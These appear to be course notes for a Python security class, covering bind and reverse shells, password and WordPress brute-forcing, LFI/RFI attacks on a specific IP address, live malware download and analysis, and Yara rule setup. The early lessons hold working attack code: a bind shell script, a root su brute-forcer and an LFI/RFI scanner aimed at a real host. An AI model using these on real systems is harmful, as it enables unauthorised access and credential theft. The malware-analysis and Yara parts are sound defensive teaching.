http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html


######################################
# Lesson 26: Bind and Reverse Shells #
######################################
vi simplebindshell.py


#!/bin/python
import os,sys,socket

ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
print '-Creating socket..'
port = 31337
try:
    ls.bind(('', port))
    print '-Binding the port on '
    ls.listen(1)
    print '-Listening, '
    (conn, addr) = ls.accept()
    print '-Waiting for connection...'
    cli= conn.fileno()
    print '-Redirecting shell...'
    os.dup2(cli, 0)
    print 'In, '
    os.dup2(cli, 1)
    print 'Out, '
    os.dup2(cli, 2)
    print 'Err'
    print 'Done!'
    arg0='/bin/sh'
    arg1='-a'
    args=[arg0]+[arg1]
    os.execv(arg0, args)
except(socket.error):
    print 'fail\n'
    conn.close()
    sys.exit(1)


nc TARGETIP 31337


---------------------
Preparing the target for a reverse shell
$ ncat -lvp 4444


--open another terminal--
wget https://www.trustedsec.com/files/simple_py_shell.py

vi simple_py_shell.py


-------------------------------
Tricky shells

Reference:
http://securityweekly.com/2011/10/python-one-line-shell-code.html
http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/


#############################
# Reference Videos To Watch #
#############################
Here is your third set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)


#################################################
# Lesson 27: Python Functions & String Handling #
#################################################

Python can make use of functions:
http://www.tutorialspoint.com/python/python_functions.htm


Python can interact with the 'crypt' function used to create Unix passwords:
http://docs.python.org/2/library/crypt.html


Tonight we will see a lot of the split() method so be sure to keep the following references close by:
http://www.tutorialspoint.com/python/string_split.htm


Tonight we will see a lot of slicing so be sure to keep the following references close by:
http://techearth.net/python/index.php5?title=Python:Basics:Slices


################################
# Lesson 28: Password Cracking #
################################

wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py

vi htcrack.py

vi list.txt

hello
goodbye
red
blue
yourname
tim
bob


htpasswd -nd yourname
    - enter yourname as the password


python htcrack.py joe:7XsJIbCFzqg/o list.txt


sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc

rm -rf mechanize-0.2.5.tar.gz

sudo /bin/bash

passwd
    ***set root password***


vi rootbrute.py


#!/usr/bin/env python

import sys
try:
        import pexpect
except(ImportError):
        print "\nYou need the pexpect module."
        print "http://www.noah.org/wiki/Pexpect\n"
        sys.exit(1)

#Change this if needed.
# LOGIN_ERROR = 'su: incorrect password'
LOGIN_ERROR = "su: Authentication failure"

def brute(word):
        print "Trying:",word
        child = pexpect.spawn('/bin/su')
        child.expect('Password: ')
        child.sendline(word)
        i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
        if i == 1:
                print "Incorrect Password"

        if i == 2:
                print "\n\t[!] Root Password:" ,word
                child.sendline ('id')
                print child.before
                child.interact()

if len(sys.argv) != 2:
        print "\nUsage : ./rootbrute.py <wordlist>"
        print "Eg: ./rootbrute.py words.txt\n"
        sys.exit(1)

try:
        words = open(sys.argv[1], "r").readlines()
except(IOError):
        print "\nError: Check your wordlist path\n"
        sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
        brute(word.replace("\n",""))


References you might find helpful:
http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python


wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py

vi md5crack.py


Why use hexdigest
http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string


http://md5online.net/


wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py


#############################
# Reference Videos To Watch #
#############################
Here is your forth set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)


######################
# Lesson 29: Web App #
######################
vi wpbruteforcer.py


python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt


- Here is an example of an LFI
- Open this page in Firefox:
http://54.186.248.116/showfile.php?filename=contactus.txt

- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
- Here you see a direct reference to a file on the local filesystem of the victim machine.
- You can attack this by doing the following:
http://54.186.248.116/showfile.php?filename=/etc/passwd

- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
- somewhere else on the Internet. Here is an example of a text file on the web:
http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt

- Now we can attack the target via RFI like this:
http://54.186.248.116/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt


- Now let's see if we can write some code to do this for us:

vi LFI-RFI.py


#!/usr/bin/env python
print "\n### PHP LFI/RFI Detector ###"
print "### Sean Arries 09/18/09 ###\n"

import urllib2,re,sys


TARGET = "http://54.186.248.116/showfile.php?filename=contactus.txt"
RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
TravLimit = 12

print "==> Testing for LFI vulns.."
TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
    TARGET += "../"
    try:
        source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
    except urllib2.URLError, e:
        print "$$$ We had an Error:",e
        sys.exit(0)
    if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
        print "!! ==> LFI Found:",TARGET+"etc/passwd"
        break ## BREAK LOOP WHEN VULN FOUND

print "\n==> Testing for RFI vulns.."
TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
try:
    source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
except urllib2.URLError, e:
    print "$$$ We had an Error:",e
    sys.exit(0)
if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
    print "!! => RFI Found:",TARGET


print "\nScan Complete\n" ## DONE


###############################
# Lesson 30: Malware Analysis #
###############################
This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
wget http://www.beenuarora.com/code/analyse_malware.py

unzip malware-password-is-infected.zip
    infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe

***What is '4d 5a' or 'MZ'***
Reference: http://www.garykessler.net/library/file_sigs.html


objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

                            - We didn't see anything like HKLM, HKCU or other registry type stuff

strings malware.exe | grep -i irc

strings malware.exe | grep -i join

strings malware.exe | grep -i admin

strings malware.exe | grep -i list


                            - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
sudo apt-get install -y python-pefile

vi analyse_malware.py

python analyse_malware.py malware.exe


Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2


Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/

##########################################
# Lesson 31: Creating a Malware Database #
##########################################

Creating a malware database (sqlite)
------------------------------------
wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
unzip malware-password-is-infected.zip
    infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e


Creating a malware database (mysql)
-----------------------------------
Step 1: Installing MySQL database
Run the following command in the terminal:

sudo apt-get install mysql-server

Step 2: Installing Python MySQLdb module
Run the following command in the terminal:

sudo apt-get build-dep python-mysqldb
sudo apt-get install python-mysqldb

Step 3: Logging in
Run the following command in the terminal:

mysql -u root -p                    (set a password of 'malware')

Then create one database by running following command:

create database malware;


wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py -i          (fill in database connection information)

python mal_to_db.py -i

python mal_to_db.py -i -f malware.exe -u


mysql -u root -p
    malware

mysql> use malware;

select id,md5,sha1,sha256,time FROM files;

mysql> quit;


##############################
# Lesson 32: Setting up Yara #
##############################


sudo apt-get install clamav clamav-freshclam

sudo freshclam

sudo Clamscan

sudo apt-get install libpcre3 libpcre3-dev

wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz

wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz

tar -zxvf v3.1.0.tar.gz

cd yara-3.1.0/

./bootstrap.sh

./configure

make

make check

sudo make install

cd yara-python/

python setup.py build

sudo python setup.py install

cd ..

yara -v

wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py

sigtool -u /var/lib/clamav/main.cvd

python clamav_to_yara.py -f main.ndb -o clamav.yara

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip

unzip malware-password-is-infected.zip
    infected

mkdir malcode/

mv malware.exe malcode/

vi testrule.yara
----------------
rule IsPE
{
    meta:
        description = "Windows executable file"

    condition:
        // MZ signature at offset 0 and ...
        uint16(0) == 0x5A4D and
        // ... PE signature at offset stored in MZ header at 0x3C
        uint32(uint32(0x3C)) == 0x00004550
}

rule has_no_DEP
{
    meta:
        description = "DEP is not enabled"

    condition:
        IsPE and
        uint16(uint32(0x3C)+0x5E) & 0x00100 == 0
}

rule has_no_ASLR
{
    meta:
        description = "ASLR is not enabled"

    condition:
        IsPE and
        uint16(uint32(0x3C)+0x5E) & 0x0040 == 0
}
----------------


yara testrule.yara malcode/malware.exe

mkdir rules/

cd rules/

wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara

wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara

wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara

cd ..

yara rules/ malcode/malware.exe

wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip

unzip master.zip

cd YaraGenerator-master/

python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe"

cat Test-Rule-2.yar

wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

yara Test-Rule-2.yar putty.exe


####################
# Additional Tasks #
####################

- PE Scanner:
https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py
http://www.beenuarora.com/code/analyse_malware.py

- AV submission:
http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py

- Malware Database Creation:
https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py